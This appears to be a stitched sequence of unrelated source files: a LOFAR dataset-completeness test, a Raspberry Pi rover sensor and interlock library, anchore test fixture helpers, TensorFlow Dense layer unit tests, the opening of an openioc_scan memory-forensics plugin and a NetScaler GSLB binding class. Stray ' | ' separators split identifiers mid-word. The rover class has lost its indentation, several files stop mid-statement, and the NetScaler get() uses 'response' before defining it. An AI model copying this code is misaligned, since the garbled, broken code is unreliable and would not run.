    for data_product_folder, completeness_value in f0seqnr_completeness_dict.items():
        if completeness_value < 99.95:
            print("Dataset: ", data_product_folder, " Completeness: %0.1f%%" % completeness_value)
    print("\nIncomplete datasets based on relative (Max size = %rMB) file size:" % highest_file_size_mb)
    for data_product_folder, (_, _, file_size_in_mb) in file_sizes_dict.items():
        if file_size_in_mb < highest_file_size_mb:
            print("Dataset: ", data_product_folder, " Size: ", file_size_in_mb, "MB ", "(%0.f%%)" % (100*file_size_in_mb/highest_file_size_mb))
    print('\n'.join(['%s: %dMB (%0.f%%)' % (name, size, f0seqnr_completeness_dict.get(name, -1)) for (name, size) in sorted(analysed_file_sizes_dict['odd_sized_data_sets'])]))
    # Render the same data into the inspection-plots HTML page.
    open("./index.html", 'w').write('''
    <html>
    <head>
    <meta http-equiv="refresh" content="60">
    <title>LOFAR Inspection plots</title>
    </head>
    <body>
    <h1>LOFAR inspection plots</h1>
    <table>
    <tr><th>SAS ID</th> <th>Campaign</th> <th>Target</th> <th>DynSpec</th> <th title="Percentage of odd sized data products per project\n\nWhere 'odd sized' is defined as:\nData products with less than %0.2f%% completeness">Compl</th> <th title="Average completeness percentage of odd sized data products (based on f0seqnr sizes)\n\nWhere 'odd sized' is defined as:\nData products with less than %0.2f%% completeness">Compl*</th> <th>AntennaSet</th> <th>Band</th> <th>Start</th> <th>End</th> <th>Clock</th> <th>Subb</th> <th>Parset</th></tr>
    %s
    </table>
    </body>
    </html>
    ''' % (100*(1-create_html.DATA_INCOMPLETE_THRESHOLD),
           100*(1-create_html.DATA_INCOMPLETE_THRESHOLD),
           create_html.observation_table_row(parset, analysed_file_sizes_dict, f0seqnr_completeness_dict, "./")))
    return result
def parse_arguments(argv):
    """Extract the four positional command-line arguments.

    argv[0] (the program name) is ignored; extra trailing arguments are
    ignored as well. Raises IndexError when fewer than four arguments
    are supplied.

    Returns a tuple: (sas_id as int, parset path, file-sizes path,
    f0seqnr-sizes path).
    """
    return (int(argv[1]), argv[2], argv[3], argv[4])
if __name__ == '__main__':
    # Echo the exact invocation so test logs are self-describing.
    print("Called as: %s\n" % (" ".join(sys.argv)))
    # Exactly four user arguments are required (argv[0] is the script name).
    if len(sys.argv) == 5:
        sas_id, parset_path, file_sizes_path, f0seqnr_sizes_file_path = parse_arguments(sys.argv)
        if test_main(sas_id, parset_path, file_sizes_path, f0seqnr_sizes_file_path):
            print("Test successful")
        else:
            print("Test unsuccessful")
    else:
        print ("Usage:\ntestf0seqnrcalculation [SAS ID] [parset file_path] [file_sizes_path] [f0seqnr_sizes_file_path]")
|
stevens4/rover3 | lowLevelLibrary.py | Python | gpl-2.0 | 9,709 | 0.009888 |
from Adafruit_ADS1x15 import ADS1x15 as A2DObject
from functools import partial
# create AI channel objects
class aiChannel:
    """Analog-input channel backed by an ADS1x15 I2C ADC (Python 2).

    Wraps one single-ended (RSE) or differential connection on the ADC and
    maps raw voltages to engineering units via a polynomial or exponential
    calibration defined in the configuration dictionary.
    """
    def __init__(self,confDict):
        #open connection on physicalChannel
        self.name = confDict['labelText']
        self.i2cAddress = confDict['i2cAddress']
        # 'RSE' (single-ended) or 'diff' (differential pair).
        self.connectionType = confDict['connectionType']
        # int for RSE; for 'diff' a 2-sequence (positive, negative) pin pair.
        self.physChan = confDict['physicalChannel']
        self.gain = confDict['gainFactor']
        self.rate = confDict['sampleRate']
        # Optional display widget; set externally, used by getLastReading().
        self.LCD = None
        # 'poly' (4th-order polynomial) or 'exp' (a*b**V) voltage mapping.
        self.mapStyle = confDict['mappingStyle']
        self.mapParams = confDict['mapParams']
        self.units = confDict['mappedUnits']
        self.connection = A2DObject(address=self.i2cAddress)
        self.readOrder = confDict['readOrder']
    # gets the latest raw, measured voltage off the ADC
    def getLatestVoltage(self):
        if self.connectionType == 'RSE':
            return self.connection.readADCSingleEnded(
                channel=self.physChan,
                pga=self.gain,
                sps=self.rate
            )
        elif self.connectionType == 'diff':
            return self.connection.readADCDifferential(
                chP=self.physChan[0], chN=self.physChan[1],
                pga=self.gain,
                sps=self.rate
            )
        else:
            # Misconfigured channel: warn and report 0 volts rather than raise.
            print 'UNKNOWN CONNECTION TYPE SPECIFIED!!!'
            return 0
    # maps the raw voltage to a reading (e.g. volts -> pressure)
    def _map(self,voltage):
        if self.mapStyle == 'poly':
            # 4th-order polynomial: p0 + p1*V + p2*V^2 + p3*V^3 + p4*V^4
            reading = self.mapParams[0]
            reading += self.mapParams[1]*voltage
            reading += self.mapParams[2]*voltage**2
            reading += self.mapParams[3]*voltage**3
            reading += self.mapParams[4]*voltage**4
        elif self.mapStyle == 'exp':
            # Exponential calibration: p0 * p1**V
            reading = self.mapParams[0]*(self.mapParams[1]**voltage)
        else:
            reading = 0
            print 'no mapping style was defined!'
        return reading
    # gets the latest reading off the ADC
    def getLastReading(self):
        newVoltage = self.getLatestVoltage()
        newReading = self._map(newVoltage)
        # Mirror the reading on the attached display, when one is wired up.
        if self.LCD is not None:
            self.LCD.display(newReading)
        return newReading
    # gets N readings and returns the average
    def getNReadings(self,nSamp):
        if self.connectionType == 'RSE':
            # Continuous-conversion mode: start, poll nSamp results, stop.
            self.connection.startContinuousConversion(
                channel = self.physChan,
                pga = self.gain,
                sps = self.rate
            )
            total = 0.
            for i in range(nSamp):
                total += self.connection.getLastConversionResults()
            self.connection.stopContinuousConversion()
            # Average the raw voltages first, then map once.
            result = self._map(total/nSamp)
            return result
        elif self.connectionType == 'diff':
            self.connection.startContinuousDifferentialConversion(
                chP=self.physChan[0], chN=self.physChan[1],
                pga=self.gain,
                sps=self.rate
            )
            total = 0.
            for i in range(nSamp):
                total += self.connection.getLastConversionResults()
            self.connection.stopContinuousConversion()
            result = self._map(total/nSamp)
            return result
        else:
            print 'UNKNOWN CONNECTION TYPE SPECIFIED!!!'
            return 0
from config import roverLogPath
import ConfigParser
import os
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM) # use pin numberings printed on cobbler
GPIO.setwarnings(False) # silence overuse warnings in case you have two DO's on same pin
# create DO channel objects
class doChannel:
def __init__(self,confDict,aiChanDict,clockFunct=None):
# read in static class variables
self.name = confDict['name']
self.physChanNum = confDict['physicalChannel']
self.labelText = confDict['labelText']
self.aiChanDict = aiChanDict
self.clockFunctio | n = clockFunct
self.currentState = False
GPIO.setup(self.physChanNum,GPIO.OUT)
initState = confDict['initState'] in ['True']
self.setState(initState)
| self.interlockState = False
initInterlockState = confDict['initInterlockState'] in ['True']
self.setInterlockState(initInterlockState)
self.interlocks = {}
self.confDict = confDict
# initialize interlock configparser object, read in
self.interlockConfigParser = ConfigParser.RawConfigParser()
self.interlockConfigFilename = os.path.join(roverLogPath, 'interlockConfigs', 'interlockConfig_'+self.name+'.txt')
self.interlockConfigParser.read(self.interlockConfigFilename)
# parse the interlocks config dicts and create each
for interlockKey in self.interlockConfigParser.sections():
thisInterlockConfDict = {}
thisInterlockConfDict['senseChan'] = self.interlockConfigParser.get(interlockKey, 'senseChan')
thisInterlockConfDict['logFun'] = self.interlockConfigParser.get(interlockKey, 'logFun')
thisInterlockConfDict['limVal'] = float(self.interlockConfigParser.get(interlockKey, 'limVal'))
thisAIChanObj = self.aiChanDict[thisInterlockConfDict['senseChan']]
thisInterlock = self.createInterlock(thisInterlockConfDict,thisAIChanObj,key=int(interlockKey))
def setState(self, newState):
GPIO.output(self.physChanNum, newState)
if self.clockFunction is not None:
self.clockFunction()
self.currentState = newState
if newState == True: stateStr = 'ON'
if newState == False: stateStr = 'OFF'
print self.name+' has been turned '+stateStr
def getState(self):
state = GPIO.input(self.physChanNum)
self.currentState = state
return state
def createInterlock(self,confDict,aiObj,key=None):
newInterlock = interlock(confDict,aiObj)
if key is None:
interlockIndex = len(self.interlocks.keys())
else:
interlockIndex = key
self.interlocks[interlockIndex] = newInterlock
def addInterlock(self,interlock):
interlockIndex = len(self.interlocks.keys())
self.interlocks[interlockIndex] = interlock
def deleteInterlock(self,interlockKey):
del self.interlocks[interlockKey]
def getInterlocks(self):
return self.interlocks
def setInterlockState(self,newState):
self.interlockState = newState
def testInterlocks(self):
if not self.interlockState: return False
for interlock in self.interlocks.values():
if interlock.testInterlock():
print 'INTERLOCK TRIPPED ON '+self.name+'!!!'
print str(interlock.aiChannelObj.name)+' was measured above setpoint of '+str(interlock.limitValue)+' at '+str(interlock.aiChannelObj.LCD.value())
return True
return False
def configUpdate(self):
for interlockKey, interlock in self.interlocks.items():
confDict = interlock.getConfDict()
interlockKey = str(interlockKey)
if interlockKey not in self.interlockConfigParser.sections():
self.interlockConfigParser.add_section(interlockKey)
self.interlockConfigParser.set(interlockKey, 'senseChan', confDict['senseChan'])
self.interlockConfigParser.set(interlockKey, 'logFun', confDict['logFun'])
self.interlockConfigParser.set(interlockKey, 'limVal', str(confDict['limVal']))
configSectionList = self.interlockConfigParser.sections()
for configSection in configSectionList:
if int(configSection) not in self.interlocks.keys():
self.interlockConfigParser.remove_section(configSection)
with open(self.interlockConfigFilename, 'wb') as configfile:
self.interlockConfigParser.write(configfile)
# create interlock object
# up |
anchore/anchore-engine | tests/functional/clients/standalone/package_list/__init__.py | Python | apache-2.0 | 1,723 | 0.001741 | import pytest
#
# Preloaded fixtures, with pytest.param that allows a nicer repr when the test runs, instead of the
# default which slaps the whole (giant) dictionary, making output unreadable.
#
def package_path(path):
    """Return the last two components of *path*, joined with '/'.

    JS packages all end in ``package.json``, so keeping the parent
    directory too (e.g. ``has/package.json`` instead of just
    ``package.json``) yields a recognizable identifier.
    """
    return "/".join(path.split("/")[-2:])
def path_params(pkgs):
    """Wrap each package path in ``pytest.param`` with a readable id.

    Pytest would otherwise use the full (very long) path string as the
    test id; ``package_path`` trims it to the last two components so the
    test output stays readable.
    """
    return [pytest.param(key, id=package_path(key)) for key in pkgs]
def metadata_params(pkgs, fields=None):
    """Produce ``pytest.param`` tuples with readable ids for metadata tests.

    Fix: removed dataset-extraction artifacts (' | ') that had corrupted
    the ``params = []`` assignment and the ``for field in fields:`` loop
    header, making the function a syntax error.

    When *fields* is given, emits one param per (field, package) pair so
    each field of each package becomes its own test case; otherwise emits
    one (path, metadata) param per package.
    """
    if fields:
        params = []
        for field in fields:
            params += [
                pytest.param(
                    path,
                    metadata,
                    field,
                    id="field={} element={}".format(
                        repr(field), repr(path.split("/")[-1])
                    ),
                )
                for path, metadata in pkgs.items()
            ]
        return params
    return [
        pytest.param(path, metadata, id=package_path(path))
        for path, metadata in pkgs.items()
    ]
|
mdrumond/tensorflow | tensorflow/python/layers/core_test.py | Python | apache-2.0 | 19,327 | 0.008072 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.layers.core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import numpy as np
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.layers import core as core_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class DenseTest(test.TestCase):
  # Constructor arguments must round-trip to the layer's public attributes,
  # and unnamed layers must auto-name sequentially (dense_1, dense_2, ...).
  @test_util.run_in_graph_and_eager_modes()
  def testDenseProperties(self):
    dense = core_layers.Dense(2, activation=nn_ops.relu, name='my_dense')
    self.assertEqual(dense.units, 2)
    self.assertEqual(dense.activation, nn_ops.relu)
    self.assertEqual(dense.kernel_regularizer, None)
    self.assertEqual(dense.bias_regularizer, None)
    self.assertEqual(dense.activity_regularizer, None)
    self.assertEqual(dense.use_bias, True)
    # Test auto-naming
    dense = core_layers.Dense(2, activation=nn_ops.relu)
    dense.apply(random_ops.random_uniform((5, 2)))
    self.assertEqual(dense.name, 'dense_1')
    dense = core_layers.Dense(2, activation=nn_ops.relu)
    dense.apply(random_ops.random_uniform((5, 2)))
    self.assertEqual(dense.name, 'dense_2')
  # Calling the layer must build kernel+bias, expose them via the variable
  # properties, and (graph mode only) register them as trainable collection
  # entries under the layer's name scope.
  @test_util.run_in_graph_and_eager_modes()
  def testCall(self):
    dense = core_layers.Dense(2, activation=nn_ops.relu, name='my_dense')
    inputs = random_ops.random_uniform((5, 4), seed=1)
    outputs = dense(inputs)
    self.assertListEqual([5, 2], outputs.get_shape().as_list())
    self.assertListEqual(dense.variables, [dense.kernel, dense.bias])
    self.assertListEqual(dense.trainable_variables,
                         [dense.kernel, dense.bias])
    self.assertListEqual(dense.non_trainable_variables, [])
    if context.in_graph_mode():
      self.assertEqual(
          len(ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)), 2)
    self.assertEqual(dense.kernel.name, 'my_dense/kernel:0')
    self.assertEqual(dense.bias.name, 'my_dense/bias:0')
  # Rank-3 input exercises the tensordot code path: only the last axis is
  # contracted, leading dimensions pass through.
  @test_util.run_in_graph_and_eager_modes()
  def testCallTensorDot(self):
    dense = core_layers.Dense(2, activation=nn_ops.relu, name='my_dense')
    inputs = random_ops.random_uniform((5, 4, 3), seed=1)
    outputs = dense(inputs)
    self.assertListEqual([5, 4, 2], outputs.get_shape().as_list())
  # With use_bias=False only the kernel variable may exist; bias must be None.
  @test_util.run_in_graph_and_eager_modes()
  def testNoBias(self):
    dense = core_layers.Dense(2, use_bias=False, name='my_dense')
    inputs = random_ops.random_uniform((5, 2), seed=1)
    _ = dense(inputs)
    self.assertListEqual(dense.variables, [dense.kernel])
    self.assertListEqual(dense.trainable_variables, [dense.kernel])
    self.assertListEqual(dense.non_trainable_variables, [])
    if context.in_graph_mode():
      self.assertEqual(
          len(ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)), 1)
    self.assertEqual(dense.kernel.name, 'my_dense/kernel:0')
    self.assertEqual(dense.bias, None)
  # trainable=False moves both variables to non_trainable_variables and keeps
  # the graph-mode TRAINABLE_VARIABLES collection empty.
  @test_util.run_in_graph_and_eager_modes()
  def testNonTrainable(self):
    dense = core_layers.Dense(2, trainable=False, name='my_dense')
    inputs = random_ops.random_uniform((5, 2), seed=1)
    _ = dense(inputs)
    self.assertListEqual(dense.variables, [dense.kernel, dense.bias])
    self.assertListEqual(dense.non_trainable_variables,
                         [dense.kernel, dense.bias])
    self.assertListEqual(dense.trainable_variables, [])
    if context.in_graph_mode():
      self.assertEqual(
          len(ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)), 0)
  # One layer instance reapplied to inputs of rank 2, 3 and 4: only the last
  # dimension is replaced by the unit count, all leading dims are preserved.
  @test_util.run_in_graph_and_eager_modes()
  def testOutputShape(self):
    dense = core_layers.Dense(7, activation=nn_ops.relu, name='my_dense')
    inputs = random_ops.random_uniform((5, 3), seed=1)
    outputs = dense.apply(inputs)
    self.assertEqual(outputs.get_shape().as_list(), [5, 7])
    inputs = random_ops.random_uniform((5, 2, 3), seed=1)
    outputs = dense(inputs)
    self.assertEqual(outputs.get_shape().as_list(), [5, 2, 7])
    inputs = random_ops.random_uniform((1, 2, 4, 3), seed=1)
    outputs = dense.apply(inputs)
    self.assertEqual(outputs.get_shape().as_list(), [1, 2, 4, 7])
  # Placeholders with an unknown last dimension must be rejected (the kernel
  # shape cannot be inferred); a known last dimension is accepted regardless
  # of how many leading dims are None.
  def testCallOnPlaceHolder(self):
    inputs = array_ops.placeholder(dtype=dtypes.float32)
    dense = core_layers.Dense(4, name='my_dense')
    with self.assertRaises(ValueError):
      dense(inputs)
    inputs = array_ops.placeholder(dtype=dtypes.float32, shape=[None, None])
    dense = core_layers.Dense(4, name='my_dense')
    with self.assertRaises(ValueError):
      dense(inputs)
    inputs = array_ops.placeholder(
        dtype=dtypes.float32, shape=[None, None, None])
    dense = core_layers.Dense(4, name='my_dense')
    with self.assertRaises(ValueError):
      dense(inputs)
    inputs = array_ops.placeholder(dtype=dtypes.float32, shape=[None, 3])
    dense = core_layers.Dense(4, name='my_dense')
    dense(inputs)
    inputs = array_ops.placeholder(dtype=dtypes.float32, shape=[None, None, 3])
    dense = core_layers.Dense(4, name='my_dense')
    dense(inputs)
  # Graph-mode op naming: the output op is the activation when one is given,
  # otherwise the final BiasAdd.
  @test_util.run_in_graph_and_eager_modes()
  def testActivation(self):
    dense = core_layers.Dense(2, activation=nn_ops.relu, name='dense1')
    inputs = random_ops.random_uniform((5, 3), seed=1)
    outputs = dense(inputs)
    if context.in_graph_mode():
      self.assertEqual(outputs.op.name, 'dense1/Relu')
    dense = core_layers.Dense(2, name='dense2')
    inputs = random_ops.random_uniform((5, 3), seed=1)
    outputs = dense(inputs)
    if context.in_graph_mode():
      self.assertEqual(outputs.op.name, 'dense2/BiasAdd')
  # An activity regularizer must add exactly one entry to the graph's
  # REGULARIZATION_LOSSES collection, mirrored by the layer's .losses.
  def testActivityRegularizer(self):
    regularizer = lambda x: math_ops.reduce_sum(x) * 1e-3
    dense = core_layers.Dense(
        2, name='my_dense', activity_regularizer=regularizer)
    inputs = random_ops.random_uniform((5, 3), seed=1)
    _ = dense(inputs)
    loss_keys = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
    self.assertEqual(len(loss_keys), 1)
    self.assertListEqual(dense.losses, loss_keys)
  # A kernel regularizer likewise contributes exactly one regularization loss.
  def testKernelRegularizer(self):
    regularizer = lambda x: math_ops.reduce_sum(x) * 1e-3
    dense = core_layers.Dense(
        2, name='my_dense', kernel_regularizer=regularizer)
    inputs = random_ops.random_uniform((5, 3), seed=1)
    _ = dense(inputs)
    loss_keys = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
    self.assertEqual(len(loss_keys), 1)
    self.assertListEqual(dense.losses, loss_keys)
  # Reusing a variable scope must NOT duplicate the regularization loss:
  # the collection stays at one entry after the reuse=True call.
  def testKernelRegularizerWithReuse(self):
    regularizer = lambda x: math_ops.reduce_sum(x) * 1e-3
    inputs = random_ops.random_uniform((5, 3), seed=1)
    _ = core_layers.dense(
        inputs, 2, name='my_dense', kernel_regularizer=regularizer)
    self.assertEqual(
        len(ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)), 1)
    _ = core_layers.dense(
        inputs, 2, name='my_dense', kernel_regularizer=regularizer, reuse=True)
    self.assertEqual(
        len(ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)), 1)
def testBiasRegularizer(self):
regularizer = lambda x: math_ops.reduce_sum(x) * 1e-3
dense = core_layers.Dense(2, name='my_dens |
elhoim/openioc_scan | openioc_scan.py | Python | gpl-2.0 | 105,288 | 0.006468 | # openioc_scan Volatility plugin
# based on ioc_writer (https://github.com/mandiant/ioc_writer) and pyioc (https://github.com/jeffbryner/pyioc)
# Copyright (c) 2014 Takahiro Haruyama (@cci_forensics)
# http://takahiroharuyama.github.io/
import volatility.utils as utils
import volatility.obj as obj
import volatility.debug as debug
import volatility.constants as constants
import volati | lity.commands as commands
import volatility.plugins.common as common
import volatility.plugins.netscan as netscan
import volatility.plugins.overlays.windows.tcpip_vtypes as tcpip_vtypes
import volatility.plugins.registry.hivelist as hivelist
import volatility.plugins.registry.shimcache as shimcache
import volatility.plugins.taskmods as taskmods
import volatility.plugins.modules as modules
import volatility.plugins.modscan as modscan
import vo | latility.plugins.filescan as filescan
import volatility.plugins.privileges as privileges
import volatility.plugins.ssdt as ssdt
import volatility.plugins.mftparser as mftparser
import volatility.plugins.malware.malfind as malfind
import volatility.plugins.malware.impscan as impscan
import volatility.plugins.malware.psxview as psxview
import volatility.plugins.malware.svcscan as svcscan
import volatility.plugins.malware.apihooks as apihooks
import volatility.plugins.malware.devicetree as devicetree
import volatility.plugins.malware.callbacks as callbacks
import volatility.plugins.malware.timers as timers
import volatility.win32 as win32
import volatility.win32.hive as hivemod
import volatility.win32.rawreg as rawreg
import volatility.win32.tasks as tasks
import glob, os, re, sqlite3, urllib, socket, time
from lxml import etree as et
from ioc_writer import ioc_api
import colorama
colorama.init()
g_version = '2015/02/24'
g_cache_path = ''
g_detail_on = False
g_color_term = colorama.Fore.MAGENTA
g_color_detail = colorama.Fore.CYAN
g_sus_path_p = re.compile(r'\\ProgramData|\\\$Recycle\.Bin|\\Windows\\Temp|\\Users\\All Users|\\Users\\Default|\\Users\\Public|\\Users\\.*\\AppData', re.IGNORECASE)
READ_BLOCKSIZE = 1024 * 1024 * 10
SCORE_THRESHOLD = 100
# copied from netscan
AF_INET = 2
AF_INET6 = 0x17
inaddr_any = utils.inet_ntop(socket.AF_INET, '\0' * 4)
inaddr6_any = utils.inet_ntop(socket.AF_INET6, '\0' * 16)
if constants.VERSION < 2.4:
# copied from malfind
class MalwareObjectClases(obj.ProfileModification):
before = ['WindowsObjectClasses']
conditions = {'os': lambda x: x == 'windows'}
def modification(self, profile):
profile.object_classes.update({
'_EPROCESS': malfind.MalwareEPROCESS,
})
# copied from apihooks
# hook modes
HOOK_MODE_USER = 1
HOOK_MODE_KERNEL = 2
# hook types
HOOKTYPE_IAT = 4
HOOKTYPE_EAT = 8
HOOKTYPE_INLINE = 16
HOOKTYPE_NT_SYSCALL = 32
HOOKTYPE_CODEPAGE_KERNEL = 64
HOOKTYPE_IDT = 128
HOOKTYPE_IRP = 256
HOOKTYPE_WINSOCK = 512
# names for hook types
hook_type_strings = apihooks.hook_type_strings
WINSOCK_TABLE = apihooks.WINSOCK_TABLE
# copied from devicetree
MAJOR_FUNCTIONS = devicetree.MAJOR_FUNCTIONS
# copied from privileges
PRIVILEGE_INFO = privileges.PRIVILEGE_INFO
class Timer(object):
    """Context manager that measures the wall-clock time of its body.

    After the with-block exits, ``secs`` holds elapsed seconds, ``msecs``
    the same interval in milliseconds, and ``start``/``end`` the raw
    ``time.time()`` stamps. With ``verbose=True`` the elapsed time is
    printed on exit.
    """

    def __init__(self, verbose=False):
        self.verbose = verbose

    def __enter__(self):
        self.start = time.time()
        return self

    def __exit__(self, *args):
        self.end = time.time()
        self.secs = self.end - self.start
        self.msecs = self.secs * 1000  # elapsed wall time in milliseconds
        if self.verbose:
            print('elapsed time: %f ms' % self.msecs)
class ItemUtil:
    """Helpers for evaluating OpenIOC indicator terms against scan results.

    The check_* methods implement the OpenIOC condition operators for
    string and integer terms; extract_* pull printable strings out of raw
    memory; fetch*_from_db reuse cached results from the sqlite store.
    Matched-term details are echoed when the module-global g_detail_on
    flag is set, colored via g_color_detail / colorama.
    """
    def is_condition_bool(self, condition):
        # Conditions supported for boolean IOC terms.
        supported_conditions = ['is', 'contains']
        if condition in supported_conditions:
            return True
        else:
            return False
    def is_condition_string(self, condition):
        # Conditions supported for string IOC terms.
        supported_conditions = ['is', 'contains', 'matches', 'starts-with', 'ends-with']
        if condition in supported_conditions:
            return True
        else:
            return False
    def is_condition_integer(self, condition):
        # Conditions supported for integer IOC terms.
        supported_conditions = ['is', 'greater-than', 'less-than']
        if condition in supported_conditions:
            return True
        else:
            return False
    def make_regex(self, content, preserve_case):
        # preserve_case is the IOC attribute string 'true'/'false', not a bool.
        if preserve_case == 'true':
            pattern = re.compile(content, re.DOTALL)
        else:
            pattern = re.compile(content, re.DOTALL | re.IGNORECASE)
        return pattern
    def check_string(self, target, content, condition, preserve_case):
        """Return True if `target` satisfies `condition` w.r.t. `content`."""
        #out = colorama.Style.BRIGHT + g_color_detail + target + colorama.Fore.RESET + colorama.Style.RESET_ALL
        out = g_color_detail + target + colorama.Fore.RESET
        if condition == 'matches':
            # Regex match; case handling is baked into the compiled pattern.
            pattern = self.make_regex(content, preserve_case)
            if pattern.search(target) is not None:
                if g_detail_on:
                    print('matched IOC term detail: {0}'.format(out))
                return True
        else:
            # Plain string operators are case-folded unless preserve_case='true'.
            if preserve_case == 'false':
                target = target.lower()
                content = content.lower()
            if condition == 'is':
                if target == content:
                    if g_detail_on:
                        print('matched IOC term detail: {0}'.format(out))
                    return True
            elif condition == 'contains':
                if target.find(content) != -1:
                    if g_detail_on:
                        print('matched IOC term detail: {0}'.format(out))
                    return True
            elif condition == 'starts-with':
                if target.startswith(content):
                    if g_detail_on:
                        print('matched IOC term detail: {0}'.format(out))
                    return True
            elif condition == 'ends-with':
                if target.endswith(content):
                    if g_detail_on:
                        print('matched IOC term detail: {0}'.format(out))
                    return True
        return False
    def check_strings(self, target_list, content, condition, preserve_case):
        # True if ANY target matches. Deliberately checks every target (no
        # early return) so that each matching target's detail gets printed.
        result = False
        for target in target_list:
            if self.check_string(target, content, condition, preserve_case):
                #return True
                result = True
        #return False
        return result
    def extract_unicode(self, data):
        # UTF-16LE runs of 4+ printable ASCII chars, deduplicated.
        pat = re.compile(ur'(?:[\x20-\x7E][\x00]){4,}')
        return list(set([w.decode('utf-16le') for w in pat.findall(data)]))
    def extract_ascii(self, data):
        # ASCII runs of 4+ printable chars, deduplicated.
        pat = re.compile(r'(?:[\x20-\x7E]){4,}')
        return list(set([w.decode('ascii') for w in pat.findall(data)]))
    def check_integer(self, target, content, condition, preserve_case):
        # preserve_case is accepted for signature symmetry; unused for ints.
        if condition == 'is':
            if target == content:
                return True
        elif condition == 'greater-than':
            if target > content:
                return True
        elif condition == 'less-than':
            if target < content:
                return True
        return False
    def check_integers(self, target_list, content, condition, preserve_case):
        # True as soon as any target satisfies the condition.
        for target in target_list:
            if self.check_integer(target, content, condition, preserve_case):
                return True
        return False
    def fetchall_from_db(self, cur, table, column):
        # Reuse cached scan results: return all values of `column` in `table`.
        debug.debug("{0} already done. Results reused".format(table))
        sql = "select {0} from {1}".format(column, table)
        cur.execute(sql)
        return [record[0] for record in cur.fetchall()]
    def fetchone_from_db(self, cur, table, column):
        # Reuse cached scan results: return a single value of `column`.
        debug.debug("{0} already done. Results reused".format(table))
        sql = "select {0} from {1}".format(column, table)
        cur.execute(sql)
        return cur.fetchone()[0]
class ProcessItem(impscan.ImpScan, netscan.Netscan, malfind.Malfind, apihooks.ApiHooks):
def __init__(self, process, cur, _config):
self.process = process
self.cur = cur
self._config = _config
self.kernel_space = utils.load_as(self._config)
self.flat_space = utils.load_as(self._config, astype = |
benfinke/ns_python | nssrc/com/citrix/netscaler/nitro/resource/config/gslb/gslbsite_binding.py | Python | apache-2.0 | 3,701 | 0.032694 | #
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class gslbsite_binding(base_resource):
""" Binding class showing the resources that can be bound to gslbsite_binding.
"""
def __init__(self) :
self._sitename = ""
self.gslbsite_gslbservice_binding = []
@property
def sitename(self) :
ur"""Name of the GSLB site. If you specify a site name, details of all the site's constituent services are also displayed.<br/>Minimum length = 1.
"""
try :
return self._sitename
except Exception as e:
raise e
@sitename.setter
def sitename(self, sitename) :
ur"""Name of the GSLB site. If you specify a site name, details of all the site's constituent services are also displayed.<br/>Minimum length = 1
"""
try :
self._sitename = sitename
except Exception as e:
raise e
@property
def gslbsite_gslbservice_bindings(self) :
ur"""gslbservice that can be bound to gslbsite.
"""
try :
return self._gslbsite_gslbservice_binding
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
ur""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(gslbsite_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.gslbsite_binding
except Exception as e :
raise e
def _get_object_name(self) :
ur""" Returns the value of object identifier argument
"""
try :
if self.sitename is not None :
return str(self.sitename) |
return None
except Exception as e :
raise e
@classmethod
def get(self, service, sitename) :
ur""" Use this API to fetch gslbsite_binding resource.
"""
try :
if type(sitename) is not list :
obj = gslbsite_binding()
obj.sitename = sitename
response = obj.get_resource(service)
else :
if sitename and len(sitename) > 0 :
obj = [gslbsite_binding() for _ in range(len(sitename))]
for i in range(len(site | name)) :
obj[i].sitename = sitename[i];
response[i] = obj[i].get_resource(service)
return response
except Exception as e:
raise e
class gslbsite_binding_response(base_response):
    """Response envelope the NITRO payload formatter deserializes into.

    Fix: dropped the dead ``self.gslbsite_binding = []`` assignment that
    was immediately overwritten by the list comprehension below.
    """
    def __init__(self, length=1):
        # Standard NITRO status fields.
        self.errorcode = 0
        self.message = ""
        self.severity = ""
        self.sessionid = ""
        # One empty binding object per expected record in the response.
        self.gslbsite_binding = [gslbsite_binding() for _ in range(length)]
|
vavavr00m/pymine | util/base58.py | Python | apache-2.0 | 1,596 | 0.017544 | #!/usr/bin/env python
##
## Copyright 2009 Adriana Lukas & Alec Muffett
##
